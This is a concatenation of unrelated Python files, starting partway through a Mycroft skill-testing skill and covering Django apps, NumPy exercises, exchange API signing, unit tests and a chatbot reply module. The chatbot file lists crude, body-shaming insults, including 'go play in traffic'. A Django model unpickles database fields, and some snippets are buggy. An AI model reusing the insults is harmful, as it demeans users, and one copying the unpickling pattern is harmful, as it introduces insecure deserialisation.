subject = self.translate('phrase.results.email.subject', data)
self.send_email(subject, email)
# Reset variables and finish
self.reset_test_env()
def reset_test_env(self):
self.all_test_results = [['Utterance', 'Skill', 'IntentHandler', \
'TimeToIntent', 'TimeToTextRes', \
'TimeToAudioRes', 'Responses']]
self.test_result = []
self.responses = []
self.files_created = []
def get_device_name(self):
try:
return DeviceApi().get()['name']
except:
return self.log.exception('API Error')
return ':error:'
@intent_file_handler('create.tests.intent')
def handle_create_tests(self, message):
# imported_csv = '/'.join([
# self.file_path_base,
# 'skill-testing-skill.krisgesling',
# 'tests_to_create.csv'])
# self.create_tests(imported_csv)
self.log.debug('Creating test files')
with open(self.output_file) as csvfile:
tests_to_create = csv.DictReader(csvfile)
for test in tests_to_create:
if test['Skill'] == '':
continue
test_file_name = "".join(
x for x in test['Utterance'] \
if (x.isalnum() or x in "._-")) + 'intent.json'
# TODO Fix - need to get Skill directory from Skillname
# [self.file_path_base, test['Skill'], \
test_file_path = '/'.join(
[self.file_path_base, 'mycroft-weather.mycroftai', \
self.file_path_test, test_file_name])
self.files_created.append(test_file_path)
with open(test_file_path, "w+") as test_file:
test_file.write(self.test_template(
test['Utterance'], test['IntentHandler']))
test_file.close()
def test_template(self, utterance, intent_type):
return '\n'.join(['{',
' "utterance": "{utterance}",',
' "intent_type": "{intent_type}"',
'}'])
@intent_file_handler('run.tests.intent')
def handle_run_tests(self, message):
self.speak('running tests')
os.system('mycroft-start skillstest')
@intent_file_handler('remove.tests.intent')
def handle_remove_tests(self, message):
self.log.debug('Removing files')
files_removed = []
for f in self.files_created:
if os.path.exists(f):
os.remove(f)
files_removed.append(f)
if set(files_removed) == set(self.files_created):
self.speak_dialog('all.files.removed')
self.files_created = []
else:
self.speak_dialog('file.removal.failed')
self.log.info('WARNING: Some files could not be removed')
files_not_removed = set(self.files_created) - set(files_removed)
for f in files_not_removed:
self.log.info(f)
def get_skills_dir():
return (
os.path.expanduser(os.environ.get('SKILLS_DIR', '')) or
os.path.expanduser(join(
Configuration.get()['data_dir'],
Configuration.get()['skills']['msm']['directory']
))
)
def stop(self):
self.remove_event('mycroft.skill.handler.start')
self.remove_event('speak')
self.remove_event('recognizer_loop:audio_output_start')
pass
def create_skill():
return SkillTesting()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-11 15:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('crawl', '0002_auto_20170710_1514'),
]
operations = [
migrations.CreateModel(
name='Lotte',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pro_name', models.CharField(max_length=200)),
('price', models.IntegerField()),
],
),
]
|
import tensorflow as tf
#NewCheckpointReader可以读取checkpoint文件中保存的所有变量
#后面的.index和.data可以省去
reader = tf.train.NewCheckpointReader("model_saved/model.ckpt")
#获得变量名-变量维度的字典
global_variables = reader.get_variable_to_shape_map()
for variable_name in global_variables:
print(variable_name, global_variables[variable_name])
print("Value for variable v1 is ", reader.get_tensor("v1"))
|
from .event import Event
from .exclusionregion import ExclusionRegion
__all__ = (Event, ExclusionRegion)
|
from random import randint
# When the bot receives a compliment
def compliment():
message = [
'Thank you so much!',
'Oh, you\'re too kind',
'This is why you\'re my favorite!'
]
return chooseResponse(message)
def giveCompliment():
message = [
'Your smile is contagious.',
'I bet you make babies smile.',
'You have the best laugh.',
'You light up the room.',
'You have a great sense of humor.',
"If cartoon bluebirds were real, a couple of 'em would be sitting on your shoulders singing right now.",
"You're like sunshine on a rainy day.",
'You bring out the best in other people.',
'I bet you sweat glitter.',
"Colors seem brighter when you're around.",
"You're more fun than a ball pit filled with candy.",
'Jokes are funnier when you tell them.',
'You always know how to find that silver lining.',
"You're a candle in the darkness.",
'Being around you is like a happy little vacation.',
"You're more fun than bubble wrap.",
"You're like a breath of fresh air.",
"You're someone's reason to smile.",
'You have impeccable manners.',
'I like your style.',
"You're strong.",
"Is that your picture next to 'charming' in the dictionary?",
'Your kindness is a balm to all who encounter it.',
'You are brave.',
'Your insides are even more beautiful than your outside.',
'You have the courage of your convictions.',
"You're a great listener.",
'You were cool way before hipsters were cool.',
"That thing you don't like about yourself is what makes you really interesting.",
"You're inspiring.",
"You're so thoughtful.",
'When you make up your mind, nothing stands in your way.',
'You seem to really know who you are.',
"You're a smart cookie.",
'Your perspective is refreshing.',
'Your ability to recall random factoids at just the right times is impressive.',
"When you say, 'I meant to do that,' I totally believe you.",
'You have the best ideas.',
"You're always learning new things and trying to better yourself. That's awesome.",
'If someone based an Internet meme on you, it would have impeccable grammar.',
'You could survive a zombie apocalypse.',
'When you make a mistake, you fix it.',
"You're great at figuring stuff out.",
'Your creative potential seems limitless.',
'I bet you do crossword puzzles in ink.',
'You have a good head on your shoulders.',
'Everyone gets knocked down sometimes; only people like you get back up again and keep going.',
"You're an awesome friend.",
"You're more helpful than you realize.",
'Hanging out with you is always fun.',
"That thing where you know when someone needs something? That's amazing.",
'Being around you makes everything better.',
'You should be thanked more often. Thank you.',
"Our community is better because you're in it.",
"Someone is getting through something hard right now because you've got their back. Nice work.",
'You always know just what to say.',
'The people you love are lucky to have you in their lives.',
'Any team would be lucky to have you on it.',
'Defenseless animals are drawn to you.',
'The way you treasure your loved ones is incredible.',
"You're a gift to those around you.",
'You look great today.',
'Your eyes are breathtaking.',
"How is it that you always look so great, even if you're in ratty pajamas?",
'That color is perfect on you.',
'You smell really good.',
"You may dance like no one's watching, but everyone's watching because you're mesmerizing.",
'You have cute elbows. For real.',
'Your bellybutton is kind of adorable.',
'Your hair looks stunning.',
'Your voice is magnificent.',
'Your name suits you to a T.',
"You're irresistible when you blush.",
'Has anyone ever told you that you have great posture?',
'I appreciate you.',
'You are the most perfect you there is.',
'You are enough.',
"You're all that and a super-size bag of chips.",
"On a scale from 1 to 10, you're an 11.",
"You've got all the right moves.",
'Everything would be better if more people were like you.',
"When you're not afraid to be yourself, that's when you're incredible.",
"You're wonderful.",
"You're better than a triple-scoop ice cream cone. With sprinkles.",
"You're one of a kind.",
"If you were a box of crayons, you'd be the big industrial name-brand one with a built-in sharpener.",
'Who raised you? They deserve a medal for a job well done.',
'Somehow you make time stop and fly all at the same time.',
"In high school, I bet you were voted 'most likely to continue being awesome.'",
"If you were a scented candle they'd have to call it Perfectly Imperfect (and it would smell like summer).",
"There's ordinary, and then there's you.",
"You're even better than a unicorn because you're real.",
"You're really something special."
]
return chooseResponse(message)
def insult():
message = [
'Well that was rude',
'No need to be mean',
'That was uncalled for',
'Let\'s at least try to be civil'
]
return chooseResponse(message)
def giveInsult():
message = [
'If laughter is the best medicine, your face must be curing the world.',
"You're so ugly, you scared the crap out of the toilet.",
'Your family tree must be a cactus because everybody on it is a prick.',
"No I'm not insulting you, I'm describing you.",
"It's better to let someone think you are an Idiot than to open your mouth and prove it.",
"If I had a face like yours, I'd sue my parents.",
'Your birth certificate is an apology letter from the condom factory.',
'I guess you prove that even god makes mistakes sometimes.',
"The only way you'll ever get laid is if you crawl up a chicken's ass and wait.",
"You're so fake, Barbie is jealous.",
"My psychiatrist told me I was crazy and I said I want a second opinion. He said okay, you're ugly too.",
"You're so ugly, when your mom dropped you off at school she got a fine for littering.",
"If I wanted to kill myself I'd climb your ego and jump to your IQ.",
"You must have been born on a highway because that's where most accidents happen.",
"Brains aren't everything. In your case they're nothing.",
"I don't know what makes you so stupid, but it really works.",
'Roses are red violets are blue, God made me pretty, what happened to you?',
'Behind every fat woman there is a beautiful woman. No seriously, your in the way.',
'Calling you an idiot would be an insult to all the stupid people.',
'You, sir, are an oxygen thief!',
'Some babies were dropped on their heads but you were clearly thrown at a wall.',
"Don't like my sarcasm, well I don't like your stupid.",
"Why don't you go play in traffic.",
"I'd slap you, but that would be animal abuse.",
'They say opposites attract. I hope you meet someone who is good-looking, intelligent, and cultured.',
"Stop trying to be a smart ass, you're just an ass.",
'The last time I saw something like you, I flushed it.',
"'m busy now. Can I ignore you some other time?",
'You have Diarrhea of the mouth; constipation of the ideas.',
"If ugly were a crime, you'd get a life sentence.",
'Your mind is on vacation but your mouth is working overtime.',
"Why don't you slip into something more comfortable... like a coma.",
'Shock me, say something intelligent.',
'If your gonna be two faced, honey at least make one of them pretty.',
"Keep rolling your eyes, perhaps you'll find a brain back there.",
'You are not as bad as people say, you are much, much worse.',
"I don't know what your problem is, but I'll bet it's hard to pronounce.",
'You get ten times more girls than me? ten times zero is zero...',
'There is no vaccine against stupidity.',
"You're the reason the gene pool needs a lifeguard.",
"Sure, I've seen people like you before - but I had to pay an admission.",
"How old are you? - Wait I shouldn't ask, you can't count that high.",
"Have you been shopping lately? They're selling lives, you should go get one.",
"You're like Monday mornings, nobody likes you.",
'Of course I talk like an idiot, how else would you understand me?',
'All day I thought of you... I was at the zoo.',
'To make you laugh on Saturday, I need to you joke on Wednesday.',
"You're so fat, you could sell shade.",
"I'd like to see things from your point of view but I can't seem to get my head that far up my ass.",
"Don't you need a license to be that ugly?",
'My friend thinks he is smart. He told me an onion is the only food that makes you cry, so I threw a coconut at his face.',
'Your house is so dirty you have to wipe your feet before you go outside.',
"If you really spoke your mind, you'd be speechless.",
'Stupidity is not a crime so you are free to go.',
'You are so old, when you were a kid rainbows were black and white.',
'If I told you that I have a piece of dirt in my eye, would you move?',
'You so dumb, you think Cheerios are doughnut seeds.',
'So, a thought crossed your mind? Must have been a long and lonely journey.',
'You are so old, your birth-certificate expired.',
"Every time I'm next to you, I get a fierce desire to be alone.",
"You're so dumb that you got hit by a parked car.",
"Keep talking, someday you'll say something intelligent!",
"You're so fat, you leave footprints in concrete.",
'How did you get here? Did someone leave your cage open?',
"Pardon me, but you've obviously mistaken me for someone who gives a damn.",
"Wipe your mouth, there's still a tiny bit of bullshit around your lips.",
"Don't you have a terribly empty feeling - in your skull?",
'As an outsider, what do you think of the human race?',
"Just because you have one doesn't mean you have to act like one.",
'We can always tell when you are lying. Your lips move.',
'Are you always this stupid or is today a special occasion?'
]
return(chooseResponse(message))
def thanked():
message = [
'You\'re welcome',
'Anytime',
'No Problem',
'I\'m happy to be of service'
]
return chooseResponse(message)
# Choose a random response
def chooseResponse(messages):
return messages[randint(0,len(messages)-1)]
# Test function
print(str(compliment()))
print()
print(str(giveCompliment()))
print()
print(str(insult()))
print()
print(str(giveInsult())) |
"""
here there are 23 exercises which is based on topics
asarray(),linspace(),logspace(),basic slicing
"""
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import numpy as np
# In[2]:
#np.empty-creates uninitialized array of specified shape and dtype
#np.empty(shape, dtype, order)
arr1 = np.empty([2,3], dtype = int)
print(arr1)
# In[3]:
arr2 = np.empty([3,2], dtype = float)
print(arr2)
# In[4]:
#np.asarray(a,dtype,order)-converts python sequence into ndarray
# a-input data such as list,list of tuples,tuples etc..,
list1 = [2,4,6,8] #convert list to ndarray
arr3 = np.asarray(list1)
print(arr3)
# In[5]:
#In np.asarray, dtype is set to float
arr4 = np.asarray(list1, dtype = float)
print(arr4)
# In[6]:
#ndarray from a tuple using asarray()
tup1 = (1,3,5,7)
arr5 = np.asarray(tup1)
print(arr5)
# In[7]:
#ndarray from list of tuples using asarray()
lt = [(11,15),(20,18,25)]
arr6 = np.asarray(lt)
print(arr6)
# In[8]:
#np.linspace(start,stop,num,endpoint,retstep,dtype) -similar to arange() instead of step size number of evenly spaced values between interval is specified
arr7 = np.linspace(1,30) #default num 50 evenly spaced samples generated
print(arr7)
# In[9]:
# 8 number of evenly spaced values between 10 to 20
arr8 = np.linspace(10,20,8)
print(arr8)
# In[10]:
# endpoint is set to false (stop value 60 will not be included since endpoint is false)
arr9 = np.linspace(50,60,5,endpoint = False)
print(arr9)
# In[11]:
# to find retstep value-true-returns samples and step value
a = np.linspace(1,3,5, retstep = True)
print(a) #here retstep value is 0.5
# In[12]:
# logspace-returns numbers that are evenly spaced on a logspace
#np.logspace(start,stop,num,endpoint,base,dtype)
#start and stop endpoints of the scale are indices of the base,default-10
a1 = np.logspace(1,2,num = 10)
print(a1)
# In[13]:
# setting base of logspace to 2
a2 = np.logspace(2,11,num = 10,base = 2)
print(a2)
# In[14]:
#basic slicing - slice(start,stop,step)
#slice object is passed to extract a part of array
ar1 = np.arange(10) #ndarray is created by arange function
s = slice(1,10,2) #starting from 1 to 9 with step of 2 is sliced
print(ar1[s])
# In[15]:
#same result is obtained when slicing parameters are separated by a colon :
ar2 = ar1[1:10:2]
print(ar2)
# In[16]:
#slicing a single item
ar3 = ar1[6]
print(ar3)
# In[17]:
#slicing items in ndarray starting from index
ar4 = ar1[4:]
print(ar4)
# In[18]:
#slicing items between 5 and 10
ar5 = ar1[5:10]
print(ar5)
# In[19]:
#slicing multi-dimensional array
ar6 = np.array([[4,5,6],[7,8,9],[10,11,12]])
print(ar6)
print(ar6[1:]) # slice array from the index a[1:]
# In[20]:
# slicing done using (...) to make selction tuple of same length as dimension of an array
# to slice the array ar6 of items in second row
print("Sliced items in second row: ",ar6[1,...])
# In[21]:
#to slice the items in second column of ar6
print("Items in second column: ",ar6[...,1])
# In[22]:
#slicing all items from column 1 onwards
print("The items from column 1 onwards: ")
print(ar6[...,1:])
# In[23]:
print("Items from row 1 onwards:")
print(ar6[1:,...])
|
# coding: utf8
from django.db import models
from django.contrib.auth.models import User, PermissionsMixin
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth import get_user_model
# Create your models here.
from django.db.models import Model
from django.db.models.signals import pre_save,post_save
from datetime import date
from django.core import validators
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from TeacherGolos.permissions import GroupPermissionsMixin,UserGroup
from TeacherGolos.usermanager import Person
from TeacherGolos.utils import link_generate,create_pass
import json
import pickle
from TeacherGolos.operations.WorkFlow import WorkFlow
class ActionToken(Model):
action = models.CharField(u'Действие',max_length=20)
state = models.CharField(u'Состояние',max_length=20)
code = models.CharField(u'Код',max_length=10)
params = models.CharField(u'Параметры',max_length=600,default="")
workflow = models.CharField(u'Задания',max_length=600,default="")
def set_code(self):
self.code=create_pass()
#self.save()
def save_params(self,params):
try:
self.params=json.dumps(params)
return True
except:
return False
def save_workflow(self,params):
try:
self.workflow=pickle.dumps(params)
return True
except:
return False
def load_params(self):
try:
return json.loads(self.params)
except:
return {}
def load_workflow(self):
try:
w= pickle.loads(self.workflow)
if w==None:
return WorkFlow()
return w
except:
return WorkFlow()
def __unicode__(self):
return u'Событие %s[%s]' % (self.action,self.load_workflow().current)
def show_params(self):
return self.load_workflow().params
@property
def info_params(self):
return self.show_params()
class Meta:
verbose_name_plural = u"События"
class Task(Model):
text = models.CharField(u'Текст задания', max_length=120)
photo = models.ImageField(u'Фото к заданию',upload_to='tasks',blank=True)
photo_width = models.IntegerField(u'Длина фотографии',default=100)
photo_height = models.IntegerField(u'Ширина фотографии',default=100)
group = models.ForeignKey(UserGroup)
def photo_tag(self):
return u'<img src="/static/media/%s" style="width:%spx;height:%spx;" />' % (self.photo.name,self.photo_width,self.photo_height)
photo_tag.allow_tags = True
photo_tag.short_description = u"Фото"
def activate_url(self):
return link_generate(group=self.group.pk,code=self.group.password,task=self.pk,type='task')
activate_url.allow_tags = True
activate_url.short_description = u"Активационный код"
def activate_link(self):
return u'<a href="%s">%s</a>' % (self.activate_url(),self.group.password)
activate_link.allow_tags = True
activate_link.short_description = u"Активационная сслыка"
def qr_link(self):
return link_generate(group=self.group.pk,code=self.group.password,task=self.pk,type='task',url='qr')
qr_link.allow_tags = True
def qr_img(self):
return "<img src='%s' style='width:100px;height:100px;' />" % (self.qr_link())
qr_img.allow_tags = True
qr_img.short_description = u"QR-код"
def __unicode__(self):
return u'Опрос:%s' % self.text
class Meta:
verbose_name_plural = u"Задания"
class AnswerType(Model):
text = models.CharField(u'Текст ответа', max_length=60)
task = models.ForeignKey(Task)
def __unicode__(self):
return u'Ответ : %s' % self.text
def answer_info(self):
return {u'text':unicode(self.text),u'pk':self.pk}
class Meta:
verbose_name_plural = u'Варианты ответа'
class Vote(Model):
user = models.ForeignKey(Person)
task = models.ForeignKey(Task)
answer = models.ForeignKey(AnswerType)
def __unicode__(self):
return u'Ответ:[%s -> %s]' % (self.task.text,self.answer.text)
@property
def info(self):
return self.__unicode__()
class Meta:
verbose_name_plural = u'Ответы'
def pre_save_receiver_usergroup(sender, instance, **kwargs):
if not instance.max_count:
instance.max_count=1
if not instance.from_date:
instance.from_date=date.today()
if not instance.to_date:
instance.to_date=date.today()
if not instance.password:
instance.password= create_pass()
def pre_save_receiver_task(sender, instance, **kwargs):
if not instance.photo:
#instance.photo=models.ImageField()
instance.photo.name='tasks/default.jpg'
if not instance.group:
instance.group=UserGroup.objects.get(name=u'Студенты')
pre_save.connect(pre_save_receiver_usergroup, sender=UserGroup)
pre_save.connect(pre_save_receiver_task, sender=Task)
|
import os
import hmac
import hashlib
from urllib import urlencode as _urlencode
import base64
from enums.exchange import EXCHANGE
from utils.exchange_utils import get_exchange_name_by_id
access_keys = {}
class ExchangeKey(object):
def __init__(self, api_key, secret):
self.api_key = api_key
self.secret = secret
@classmethod
def from_file(cls, path, exchange_name):
array = []
full_path = os.path.join(path, exchange_name.lower() + ".key")
with open(full_path, "r") as myfile:
for line in myfile:
array.append(line.rstrip())
if len(array) == 2:
break
return ExchangeKey(array[0], array[1])
def signed_body(body, secret):
# The query's POST data signed by your key's "secret" according to the HMAC-SHA512 method.
payload = hmac.new(secret, _urlencode(body), hashlib.sha512).hexdigest()
return payload
def signed_body_256(body, secret):
# The query's POST data signed by your key's "secret" according to the
# HMAC-SHA512 method.
payload = hmac.new(secret.encode('utf-8'), _urlencode(body).encode('utf-8'), hashlib.sha256).hexdigest()
return payload
def sign_string_256_base64(secret, msg):
hmac_obj = hmac.new(key=secret.encode('utf-8'), msg=msg.encode('utf-8'), digestmod=hashlib.sha256)
return base64.b64encode(hmac_obj.digest())
def signed_string(body, secret):
# The query's POST data signed by your key's "secret" according to the HMAC-SHA512 method.
payload = hmac.new(secret, body, hashlib.sha512).hexdigest()
return payload
def sign_kraken(body, urlpath, secret):
""" Sign request data according to Kraken's scheme.
:param body: API request parameters
:type body: dict
:param urlpath: API URL path sans host
:type urlpath: str
:returns: signature digest
"""
postdata = _urlencode(body)
# Unicode-objects must be encoded before hashing
encoded = (str(body['nonce']) + postdata).encode()
message = urlpath.encode() + hashlib.sha256(encoded).digest()
signature = hmac.new(base64.b64decode(secret), message, hashlib.sha512)
sigdigest = base64.b64encode(signature.digest())
return sigdigest.decode()
def load_keys(path):
"""
:param path: full path to folder with public keys, each key should be named as corresponding exchange
:return:
"""
global access_keys
for exchange_id in EXCHANGE.values():
exchange_name = get_exchange_name_by_id(exchange_id)
key = ExchangeKey.from_file(path, exchange_name)
access_keys[exchange_id] = key
def load_key_by_exchange(path, exchange_id):
global access_keys
exchange_name = get_exchange_name_by_id(exchange_id)
key = ExchangeKey.from_file(path, exchange_name)
access_keys[exchange_id] = key
def get_key_by_exchange(exchange_id):
return access_keys.get(exchange_id)
|
from calculator import Calculator
import unittest
class TestCalculator(unittest.TestCase):
# test 1
def test_calculator_add(self):
result = Calculator().add(5.0,5)
self.assertEqual(10.0, result)
result = Calculator().add(2.0,3)
self.assertEqual(5.0, result)
# test 2
def test_calculator_sub(self):
result = Calculator().subtract(5,5)
self.assertEqual(0, result)
result = Calculator().subtract(3,2)
self.assertEqual(1, result)
# test 3
def test_calculator_multiply(self):
result = Calculator().multiply(5,5)
self.assertEqual(25.0, result)
result = Calculator().multiply(5,1)
self.assertEqual(5.0, result)
result = Calculator().multiply(5,1)
self.assertEqual(5.0, result)
result = Calculator().multiply(5, 0.2)
self.assertEqual(1.0, result)
# test 4
def test_calculator_divide(self):
result = Calculator().divide(5.0,5)
self.assertEqual(1.0, result)
result = Calculator().divide(5.0,1)
self.assertEqual(5.0, result)
result = Calculator().divide(1.0,5)
self.assertEqual(0.2, result)
result = Calculator().divide(5.0, 0.2)
self.assertEqual(25.0, result)
# test 5
def test_calculator_exponential(self):
result = Calculator().exponent(5.0,2)
self.assertEqual(25.0, result)
result = Calculator().exponent(5.0,3)
self.assertEqual(125.0, result)
# test 6
def test_calculator_square(self):
result = Calculator().square(5.0)
self.assertEqual(25.0, result)
result = Calculator().square(7)
self.assertEqual(49.0, result)
# test 7
def test_calculator_cube(self):
result = Calculator().cube(5.0)
self.assertEqual(125.0, result)
result = Calculator().cube(7)
self.assertEqual(343.0, result)
# test 8
def test_calculator_sin(self):
result = Calculator().sin(3)
self.assertEqual(0.1411200080598672, result)
result = Calculator().sin(-3)
self.assertEqual(-0.1411200080598672, result)
# test 9
def test_calculator_cos(self):
result = Calculator().cos(3)
self.assertEqual(-0.9899924966004454, result)
result = Calculator().cos(-3)
self.assertEqual(-0.9899924966004454, result)
result = Calculator().cos(0)
self.assertEqual(1.0, result)
# test 10
def test_calculator_tan(self):
result = Calculator().tan(3)
self.assertEqual(-0.1425465430742778, result)
result = Calculator().tan(-3)
self.assertEqual(0.1425465430742778, result)
result = Calculator().tan(0)
self.assertEqual(0.0, result)
if __name__ == '__main__':
unittest.main()
|
def giveDiv(n):
retar=[]
for i in range(1,n//2+2):
if n%i==0:
retar.append(i)
if retar[-1]!=n:
retar.append(n)
return retar
n=int(input())
divar=giveDiv(n)
#print(divar)
s=input()
for i in divar:
retain=s[i:]
reverse=s[:i]
reverse=reverse[::-1]
s=reverse+retain
print(s) |
from sklearn import datasets
import numpy as np
def get():
diabetes = datasets.load_diabetes()
features = diabetes.data
labels = diabetes.target
return {'features': features, 'labels': labels.reshape(-1, 1)}
|
import os
import json
import re
import glob
ttl_files = glob.glob('src/*.ttl');
terms = {}
for ttl_file in ttl_files:
if not re.search('realm', ttl_file) and not re.search('phen', ttl_file):
continue
print(ttl_file)
category = None
with open(ttl_file) as origin_file:
for line in origin_file:
#line = re.findall(r'rdfs:label', line)
if "rdfs:label" in line:
idx1 = line.find('"')
idx2 = line.find('"', idx1+1)
field = line[idx1+1:idx2]
else:
continue
if re.findall(r'SWEET', field):
category = re.sub('SWEET Ontology ', '', field)
elif terms.get(field, ''):
terms[field].append(category)
else:
terms[field] = [category]
#print(terms)
#SWEET Ontology
#$categories[$category] = @keywords;
#my $json = encode_json @categories;
#print "$json"; #$category: @keywords\n";
#quit()
json_folder_path = '.'
with open(os.path.join(json_folder_path, "terms1.json"), "w") as fp:
json.dump(terms, fp, indent=4)
|
from django.urls import path
from . import views
urlpatterns = [
path('get_cards/', views.get_cards, name='get_cards'),
path('add_cards/', views.add_cards, name='add_cards'),
# path('search_cards/', views.search_cards, name='search_cards'),
path('load_users/', views.load_users, name='load_users'),
] |
import cv2
import numpy as np
from matplotlib import pyplot as plt
from src.utils.const import KEYPOINT_PAIRS
BLUE_COLOR = (0, 0, 255)
ORANGE_COLOR = (255, 140, 0)
GREEN_COLOR = (0, 188, 0)
def draw_bbox(
bboxes: np.ndarray,
image: np.ndarray,
format='xyxy',
) -> np.ndarray:
"""Draw bounding box over image.
Args:
bboxes (np.ndarray): [N, 5] or [N, 4] bounding box of object.
image (np.ndarray): [H, W, 3] Image with BGR format.
format (str): format of bounding box 'xyxy' stand for
xmin, ymin, xmax, ymax and 'xywh' stand for
xmin, ymin, width, height.
"""
xmin, ymin, xmax, ymax = bboxes[:4]
def draw_keypoint(
keypoints: np.ndarray,
image: np.ndarray,
radius=4,
thickness=1,
show=False,
save_path=None,
) -> np.ndarray:
"""Visualize plotted keypoint and choose to plot or save plotted image.
Args:
keypoints (np.ndarray): [17, 2] 17 points by coco format with x, y.
image (np.ndarray): [H, W, 3] Image with BGR format.
radius (int): Radius of circle keypoint to be plot.
thickness (int): Line thickness between 2 circle keypoint.
show (bool): Whether to show a plotted image or not.
save_path (str): Path to save.
Returns:
A numpy array plotted image with BGR format.
"""
image_plot = image.copy()
color_pairs = [
BLUE_COLOR, BLUE_COLOR, BLUE_COLOR,
BLUE_COLOR, BLUE_COLOR, ORANGE_COLOR,
ORANGE_COLOR, ORANGE_COLOR, ORANGE_COLOR,
ORANGE_COLOR, ORANGE_COLOR, GREEN_COLOR,
GREEN_COLOR, GREEN_COLOR, GREEN_COLOR,
GREEN_COLOR, GREEN_COLOR,
]
for pair in KEYPOINT_PAIRS:
# Select keypoint by index from pair
first_point = keypoints[pair[0]].astype(np.int32)
first_point = tuple(first_point)
second_point = keypoints[pair[1]].astype(np.int32)
second_point = tuple(second_point)
first_point_color = color_pairs[pair[0]]
second_point_color = color_pairs[pair[1]]
line_color = first_point_color
# Plotting first point
image_plot = cv2.circle(
img=image_plot, center=first_point,
color=first_point_color, radius=radius, thickness=-1,
)
# Plotting second point
image_plot = cv2.circle(
img=image_plot, center=second_point,
color=second_point_color, radius=radius, thickness=-1,
)
# Plotting line between 2 points
image_plot = cv2.line(
img=image_plot, pt1=first_point, pt2=second_point,
color=line_color, thickness=thickness,
)
if show:
plt.imshow(cv2.cvtColor(image_plot, cv2.COLOR_BGR2RGB))
plt.axis('off')
plt.show()
if save_path is not None:
cv2.imwrite(save_path, image_plot)
return image_plot
|
from django.shortcuts import render
# Create your views here.
def attandance(request):
return render(request,"attandance/attandace_html.html")
|
'''
Created on Nov 26, 2017
@author: ray
'''
from flask import render_template
from . import main
@main.app_errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@main.app_errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500 |
from django.shortcuts import render , redirect
from .models import *
from django.shortcuts import get_object_or_404
from .forms import PostForm ,UserSignUp ,UserLogin
from django.contrib import messages
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from urllib.parse import quote
from django.http import Http404 , JsonResponse
from django.utils import timezone
from django.db.models import Q
from django.contrib.auth import authenticate,login ,logout
# Create your views here.
"""def post_create(request):
post_list = Post.objects.all()
post_filter = Post.objects.filter(title='Noor')
post_get = Post.objects.get(title = "gf")
context={
"user": request.user,
"list": post_list,
"filter": post_filter,
get": post_get
#"random_number":random.re
}
return render(request,'create.html',context) """
def like_button(request,post_id):
obj=Post.objects.get(id=post_id)
like, created = Like.objects.get_or_create(user=request.user , post=obj)
if created:
action="like"
else:
action="unlike"
like.delete()
post_like_count = obj.like_set.all().count()
context ={
"action":action,
"like_count":post_like_count,
}
return JsonResponse(context, safe=False)
def usersignup(request):
context ={}
form = UserSignUp()
context['form']=form
if request.method == "POST":
form = UserSignUp(request.POST)
if form.is_valid():
user = form.save(commit=False)
username = user.username
password = user.password
user.set_password(password)
user.save()
auth_user = authenticate(username=username,password=password)
login(request,auth_user)
return redirect("posts:list")
messages.error(request,form.errors)
return redirect("posts:signup")
return render(request,'signup.html', context)
def post_detail(request ,slug):
obj=get_object_or_404(Post, slug=slug)
date =timezone.now().date()
if obj.publish > date or obj.draft:
if not request.user.is_staff or request.user.is_superuser:
raise Http404
if request.user.is_authenticated():
if Like.objects.filter(post=obj,user=request.user).exists():
like=True
else :
like = False
post_like_count = obj.like_set.all().count()
user_like_count = request.user.like_set.all().count()
context ={
"object":obj,
}
return render(request,'post_detail.html',context)
def user_login(request):
context ={}
form = UserLogin()
context['form']=form
if request.method == "POST":
form = UserLogin(request.POST)
if form.is_valid():
username=form.cleaned_data['username']
password=form.cleaned_data['password']
auth_user = authenticate(username=username,password=password)
login(request,auth_user)
return redirect("posts:list")
messages.error(request,"Wrong username/password combination. Please try again.")
print ("--------------")
print(author_user)
print ("--------------")
return redirect("posts:login")
messages.error(request,form.errors)
return redirect("posts:login")
return render(request,'login.html', context)
def userlogout(request):
logout(request)
return redirect("posts:login")
def post_list(request):
today = timezone.now().date()
if request.user.is_staff or request.user.is_superuser:
obj_list = Post.objects.all()
else:
obj_list = Post.objects.filter(draft=False).filter(publish__lte=today)
query = request.GET.get("q")
if query:
obj_list=obj_list.filter(
Q(title__icontains=query)|
Q(content__icontains=query)|
Q(author__first_name__icontains=query)|
Q(author__last_name__icontains=query)
).distinct()
paginator = Paginator(obj_list, 4) # Show 5 contacts per page
page = request.GET.get('page')
try:
obj = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
obj = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
obj = paginator.page(paginator.num_pages)
context = {
"post_list": obj,
"today": today,
}
return render(request, 'post_list.html', context)
def post_create(request):
if not (request.user.is_staff or request.user.is_superuser):
raise Http404
form = PostForm(request.POST or None , request.FILES or None)
if form.is_valid():
obj =form.save(commit=False)
obj.author = request.user
obj.save()
messages.success(request,"OMG! So Cool!")
return redirect ("posts:list")
context = {
"form":form
}
return render(request,'post_create.html',context)
def post_update(request,slug):
if not (request.user.is_staff or request.user.is_superuser):
raise Http404
post_object = get_object_or_404(Post , slug=slug)
form = PostForm(request.POST or None , request.FILES or None ,instance=post_object)
if form.is_valid():
form.save()
#messages.success(request,"Giving it a second thought?")
return redirect ("posts:list")
context = {
"form":form,
"post_object":post_object,
}
return render(request,'post_update.html',context)
def post_delete(request, slug):
if not (request.user.is_superuser):
raise Http404
Post.objects.get(slug=slug).delete()
messages.warning(request ,"Seriously bro?")
return redirect ("posts:list")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 1 19:20:21 2018
@author: Alicia
"""
def remove_min_from_list(mylist):
if mylist:
mylist.remove(min(mylist))
return mylist
print(remove_min_from_list([2,1,34,23,2]))
|
# -*- coding: utf-8 -*-
"""
"""
try:
from collections.abc import Mapping as MappingABC
except ImportError:
from collections import Mapping as MappingABC
from ..utilities.future_from_2 import str, object, repr_compat, unicode
from ..utilities.unique import NOARG
from .deep_bunch import DeepBunch
class TagBunch(object):
"""
"""
__slots__ = ('_dict', '_tag_dicts',)
def __init__(
self,
write_dict = None,
gfunc = None,
**kwargs
):
if write_dict is None:
write_dict = DeepBunch()
self._dict = write_dict
